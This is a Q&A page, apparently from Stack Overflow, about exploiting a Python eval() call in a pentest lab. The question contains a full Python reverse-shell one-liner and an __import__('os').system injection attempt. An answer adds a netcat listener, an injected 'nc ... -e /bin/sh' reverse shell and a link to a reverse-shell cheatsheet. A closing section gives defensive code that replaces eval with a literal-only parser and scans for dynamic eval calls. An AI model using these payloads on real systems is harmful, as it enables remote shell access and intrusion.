Python - running reverse shell inside eval()


I am working on a pentest lab. There is a Python eval() function I need to exploit.

It is like this:

eval('%s>1' % payload)

I need to execute a Python reverse shell script as payload. It is

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

I am trying it like this:

eval('%s >1' "__import__('os').system('import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'")

Not sure how to import all those modules and execute it.

Any help appreciated.

2

There are 2 best solutions below

0
On

Try to include globals() and locals() in the eval (to import into the global scope). This is explained in "In Python, why doesn't an import in an exec in a function work?"

Also see https://lucumr.pocoo.org/2011/2/1/exec-in-python/, chapter "Behind the Scenes of Imports".

2
On

Maybe try it like this:

"__import__('os').system('nc your_ip port -e /bin/sh')"

Like this:

First, listen on the port in a fresh terminal:

nc -lvp 1234

After that, try in another terminal:

"__import__('os').system('nc 10.10.10.10 1234 -e /bin/sh')"

"__import__('os').system('YOUR REVERSE SHELL METHOD')"

Here are many reverse shell payloads: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

Good luck.
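The eval() call in the question evaluates whatever text reaches it. As an added example (not code from the question or from either answer), the sketch below replaces that comparison with an AST allow-list that accepts only a numeric literal, and flags eval()/exec() calls whose code argument is built at run time. The function names, the 64-character cap and the sample inputs are assumptions constructed for illustration.

```python
import ast

MAX_LEN = 64  # assumed cap; a numeric operand never needs more

def parse_number(text):
    """Accept only an optionally signed int/float literal, else ValueError."""
    if len(text) > MAX_LEN:
        raise ValueError("operand too long")
    try:
        node = ast.parse(text.strip(), mode="eval").body
    except SyntaxError as exc:
        raise ValueError("not a single expression") from exc
    sign = 1
    if isinstance(node, ast.UnaryOp) and isinstance(node.op, (ast.UAdd, ast.USub)):
        sign = -1 if isinstance(node.op, ast.USub) else 1
        node = node.operand
    # type() rather than isinstance(): bool is a subclass of int
    if isinstance(node, ast.Constant) and type(node.value) in (int, float):
        return sign * node.value
    raise ValueError("rejected node: " + type(node).__name__)

def greater_than_one(text):
    """Stand-in for eval('%s>1' % text) that never evaluates user text."""
    return parse_number(text) > 1

def classify(operands):
    out = {}  # operand -> True/False, or "rejected" if it is not a number
    for op in operands:
        try:
            out[op] = greater_than_one(op)
        except ValueError:
            out[op] = "rejected"
    return out

def find_dynamic_eval(source):
    """Line numbers of eval()/exec() calls whose code is built at run time."""
    return sorted(
        n.lineno for n in ast.walk(ast.parse(source))
        if isinstance(n, ast.Call) and isinstance(n.func, ast.Name)
        and n.func.id in ("eval", "exec") and n.args
        and not isinstance(n.args[0], ast.Constant))

# Constructed samples; the injection string is only parsed, never evaluated.
SAMPLE_OPERANDS = ["5", "-3", "True", "2 if 1 else 0", "__import__('os').system('id')"]
SAMPLE_SOURCE = "def check(p):\n    return eval('%s>1' % p)\nLIMIT = eval('2+2')\n"

if __name__ == "__main__":
    print(classify(SAMPLE_OPERANDS))
    print(find_dynamic_eval(SAMPLE_SOURCE))
```

The scanner only sees direct eval/exec names, so aliased or attribute-based calls need a separate check.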